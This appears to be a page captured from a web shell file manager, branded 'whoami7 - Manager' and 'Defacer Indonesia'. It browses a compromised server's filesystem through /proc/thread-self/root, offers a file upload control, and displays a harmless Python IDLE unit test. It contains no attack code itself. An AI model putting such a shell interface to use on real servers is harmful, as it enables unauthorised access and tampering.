whoami7 - Manager
:
/
proc
/
thread-self
/
root
/
opt
/
alt
/
python33
/
lib64
/
python3.3
/
idlelib
/
idle_test
/
Upload File:
files >> //proc/thread-self/root/opt/alt/python33/lib64/python3.3/idlelib/idle_test/test_pathbrowser.py
import unittest import idlelib.PathBrowser as PathBrowser class PathBrowserTest(unittest.TestCase): def test_DirBrowserTreeItem(self): # Issue16226 - make sure that getting a sublist works d = PathBrowser.DirBrowserTreeItem('') d.GetSubList() if __name__ == '__main__': unittest.main(verbosity=2, exit=False)
Copyright ©2021 || Defacer Indonesia